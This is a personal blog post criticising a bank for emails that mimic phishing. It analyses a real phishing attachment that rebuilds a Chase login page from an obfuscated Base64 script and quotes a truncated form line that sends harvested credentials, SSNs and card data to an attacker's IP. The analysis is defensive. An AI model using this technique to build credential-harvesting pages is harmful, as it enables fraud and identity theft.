The first time I received a “secure” email message from my bank, I was a bit suspicious of what I was actually seeing. It looked too much like a phishing attempt for my comfort. The message in my inbox was from my banker’s email address, not from Chase 1 directly. It also included an attached HTML page and instructions to “open the attached page in an browser for instructions on how to proceed.”
This immediately raised some red flags for me.
First of all, email itself is inherently insecure. Yet here was my bank allegedly sending me a “secure” message with an attachment. This looked like a textbook phishing attack, so I picked up the phone and called my banker directly.
“No, it’s legitimate. I need you to print out and sign some documents.”
I pointed out how troubling this email really was and even references back to Chase’s own “how to spot a suspicious email” documentation:
Such emails might also ask you to look at an attachment or click a link and then give your personal information on a Web page or in a form. Or the sender’s email address might look suspicious. 2
“I understand, it’s confusing. But really, I did just send this request. I can resend it if you’d like.”
The resent email looked exactly the same, but as I had my banker on the phone at the time I followed through and opened the attachment. It had links to “Click to Read Message” that legitimately took me to Chase’s secure email portal. But the entire workflow felt off and I voiced my concern to my banker, his supervisor, and to Chase customer support.
It’s impossible to train consumers on appropriate security behavior when the real ways of interacting with a bank so closely resemble phishing attacks.
Recently, I received a phishing email that looked mysteriously similar to the legitimate one above. It came from firstname.lastname@example.org, which is obviously phoney, but would be easy to miss. The email itself claimed that there is increased error activity with my account and, like the real email case above, prompts me to open an attached HTML file in a browser to continue.
Thankfully, I know better than that.
I instead downloaded the HTML file to disk and pulled it up in a code inspection window. Instead of a raw HTML file, I was greeted with a script executing:
The page dumps a massive Base64-encoded blob into the address bar. Decoding the obfuscated script directly does yield real HTML, but with a couple of … unexpected additions.
The code itself includes Chases’s actual scripts, images, and even links to legitimate “Report Abuse” pages just like a normal Chase login page. However, it also include yet another obfuscated script that adds a custom form action to the login page:
Once de-obfuscated, it’s apparent that this is the markup for a real Chase login page, with the action attribute of the submission form redirected to an attacker’s server.
form action="http://191..." class="button" method="post" name="submit" id="submit">
If an unwary user were to actually open this page in their browser, they would see a Chase-branded page asking for them to confirm:
- Account login information
- Contact information
- Card information
- Routing and account number information
- Even their SSN, driver’s license, mother’s maiden name, and DoB
All of this data is submitted not to Chase, but to the attacker’s own server! The attacker’s server, after successfully phishing the data, redirects to Chase’s online login page, so it looks like nothing at all is going on. It’s a horrible attack on users who have been, unfortunately, trained by Chase to trust the validity of attachments asking for authentication information.
Unless Chase takes a hard stand at never asking customers to log in via HTML pages emailed directly from staff, protecting average users from phishing will be incredibly difficult. There are few, if any, broad steps the community at large can take. However, there are several things you can do to ensure you never fall into a trap like this yourself.
First and foremost, never open webpages attached to emails. Even if you know the person who sent them and trust that everything is OK.
Never give up your account information to an online page someone else has asked you to fill out. Unless you’ve requested the form yourself or initiated the submission, always assume that an illegitimate attacker is on the other side of the site.
If anyone from your bank ever contacts you asking for information, refuse to comply. Never give out your data in response to a request. If they really do need your information, tell them you’ll submit it through proper, direct channels instead. Go to https://chase.com and log in to the real Secure Email center and draft your own message conveying the data. Don’t ever click a link provided by someone else – not even me – to get there. Literally type the address in your browser and go there directly.
This extends to phone calls. Never provide your information to anyone over the phone unless you initiated the phone call. If Chase (or anyone) calls you asking for data, hang up and instead call the number on the back of your debit card or on your account statement. It’s next to impossible to trust that a stranger calling (or emailing) you is really who they say they are.
Finally, report every violation you see. 3 Every time you get a bogus email or phone call from someone trying to steal information, report it. Every time you get a legitimate email or phone call from someone asking for your information, report it. Institutions with whom we trust our personal data should know better than to imitate identity thieves when they communicate. Unfortunately, it’s up to us to keep them honest.
- My banker uses an @chase.com address, but it was still troubling to receive a “please open the attached file and click the links to log in” from an address not directly tied to Chase’s secure email center. ↩
- https://www.chase.com/digital/resources/privacy-security/security/suspicious-emails ↩
- I reported both the legitimate emails and all of the phishing attempts I’ve received to Chase. To date, this is several dozen reports over two years with zero followthrough. Reports usually receive a “Thank you” and a later “You’re right, we didn’t send this” from customer support. The thanks feels good, but this does nothing to protect less tech-savvy customers from being targeted and exploited. ↩